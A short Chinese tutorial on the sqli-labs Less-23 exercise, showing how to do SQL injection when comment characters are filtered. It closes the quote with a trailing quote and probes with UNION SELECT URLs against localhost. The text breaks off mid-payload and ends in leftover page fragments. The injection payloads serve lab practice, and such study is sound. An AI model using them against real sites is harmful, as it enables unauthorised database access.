前言
之前的每一关,我们都是在末尾加上注释符,屏蔽后面的语句,这样我们只要闭合了区间之后,差不多就是为所欲为的状态。但如果注释符不生效的情况下,又该如何呢?
Less23(注释符被过滤)
第25关,这关分析源码,它是过滤了请求的注释符“--”和“#”,所以这里不能用注释符注释后面的语句。但对本关注入来说,不成问题。
本关是测试可知是单引号闭合:
http://localhost/sqli-labs/less-23/?id=1' or'

接着就按照Less1的套路来就可以了。测试列数:
http://localhost/sqli-labs/less-23/?id=1' union select 1'

列数不是1,经测试到3时没报错:
http://localhost/sqli-labs/less-23/?id=1' union select 1,2,3'

接下来测试是否前端可以回显:
http://localhost/sqli-labs/less-23/?id=-1' union select 1,2,3'</

——Less23-25(关键字被过滤、二次注入)&spm=1001.2101.3001.5002&articleId=145592192&d=1&t=3&u=d8246b48b4624428b79c396c833bade5)
674

被折叠的 条评论
为什么被折叠?



